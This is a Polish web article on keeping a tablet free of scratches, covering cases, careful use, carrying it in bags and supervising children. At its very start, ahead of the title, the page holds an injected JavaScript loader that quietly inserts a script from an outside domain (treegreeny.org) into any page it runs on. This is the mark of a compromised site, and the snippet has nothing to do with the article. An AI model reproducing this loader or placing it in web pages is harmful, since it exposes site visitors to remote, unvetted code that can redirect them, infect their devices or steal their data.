;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak ochronić tablet przed zarysowaniem? | Silico-Bit
Tablet to specyficzny rodzaj sprzętu elektronicznego – o wiele bardziej problematyczny niż laptop czy telefon. Niestety duża powierzchnia jego ekranu często ulega zarysowaniom i pęknięciom. Jak temu zapobiegać? Dlaczego ochrona tabletu jest bardziej skomplikowana, niż inne sprzęty elektroniczne, których używamy na co dzień?

Rysa na tablecie

Wszystko zależy od wymiarów. W zależności od tego, jaki tablet kupimy, jego ekran może się mniej lub bardziej rysować. Niestety nie dotyczy to tylko przedniej części urządzenia, ale także pleców urządzenia. Dostępne na rynku tablety posiadają tylną część obudowy, zazwyczaj wykonaną z tworzywa sztucznego. W dobrych modelach aluminiowe są jedynie boki, z uwagi na odkształcenia i upadki. Dlatego tył tabletu jest tak samo narażony na rysy, co przednia szybka. Bardzo często można zauważyć w opisach produktów frazy „ekran odporny na zarysowania”. Nie do końca jest to w stu procentach prawda, ponieważ o ile wzmocnione szkło jest trochę bardziej odporne na uszkodzenia, to jednak ekran nie jest całkowicie chroniony przed zarysowaniem. Dlatego decydując się na zakup tabletu powinniśmy mieć na uwadze, że rysy mogą się pojawić, mimo zapewnień o odporności ekranu. Co należy więc zrobić, żeby takich uszkodzeń było jak najmniej?

Etui do tabletu

Najpopularniejszą ochroną dla tabletu są dobrze znane obudowy do tabletu. Takie etui z pewnością ochroni go przed czynnikami, które powodują rysy na obudowie. Jest to dość skuteczny sposób, aby tablet po jakimś czasie nie wyglądał na sfatygowany. Jednak należy pamiętać, że takie obudowy czy etui mają swoje plusy i minusy. Po pierwsze wszelkie zanieczyszczenia i opiłki, które dostaną się do przestrzeni między tabletem a etui, również mogą rysować obudowę. Szczególne jeśli będzie to piasek. Kolejna sprawa to koszt takiej ochrony. Oczywiście warto w nią zainwestować, ale porządne etui kosztować może naprawdę sporo, a średniej klasy etui nie ochroni Twojego tabletu. Bardzo ważne jest także, aby dopasować futerał idealnie do modelu tabletu. Uniwersalne etui nie podoła zadaniu.

Użytkowanie tabletu

Samo etui nie chroni w stu procentach ekranu tabletu. Jeśli jest to sam case na tylną część, szybka w ogóle nie jest chroniona. Jeśli natomiast jest to etui zamykane, szybka jest narażona szczególnie podczas użytkowania sprzętu. Pamiętajmy, że nie tylko czynniki zewnętrzne mogą rysować tablet, ale także sposób jego użytkowania, np. długie paznokcie. Stukanie nimi o ekran powoduje z pozoru niewidoczne rysy, które z czasem się pogłębiają i uwidaczniają. Dodatkowo tablet powinno się użytkować czystymi dłońmi.

Tablet w torebce i plecaku

Podróżowanie z tabletem to zupełnie inna sprawa. Biorąc go na plażę, do lasu, czy na rower, automatycznie narażamy go nie tylko na zarysowania, ale także na poważne uszkodzenia. Co nie znaczy, że tabletu nie wolno nigdzie zabierać. Warto jednak zainwestować w dodatkowy, zapinany na zamek futerał, który ochroni go przed zarysowaniami, np. przedmiotami znajdującymi się w torebce czy plecaku. Wrzucony luzem tablet nie przetrwa takiej próby i już po pierwszym wyjęciu będzie przejawiał rysy. Czy warto więc wydawać pieniądze na sprzęt, żeby później niczym go nie chronić?

Tablet dla dziecka

Bardzo często kupujemy tablet z myślą o dziecku. Oglądanie bajek, proste gry czy nauka to dla rodziców chwila wytchnienia. Niestety, kontakt tabletu z dzieckiem nie idzie w parze z bezpieczeństwem. Dzieci nie posiadają tak dużych umiejętności motorycznych i koordynacyjnych, żeby zapobiec upadkowi. Małe rączki w połączeniu z dużym tabletem powodują zazwyczaj wyślizganie się tabletu. Nawet, jeśli sprzęt nie ulegnie uszkodzeniu, rysy będą się pojawiać. Dlatego najlepiej, jeśli dziecko używa tabletu w pozycji siedzącej, aby sprzęt nie miał prawa spaść. Warto uczulić pociechę na takie sytuacje lub po prostu być obok podczas użytkowania tabletu i kontrolować przebieg wydarzeń.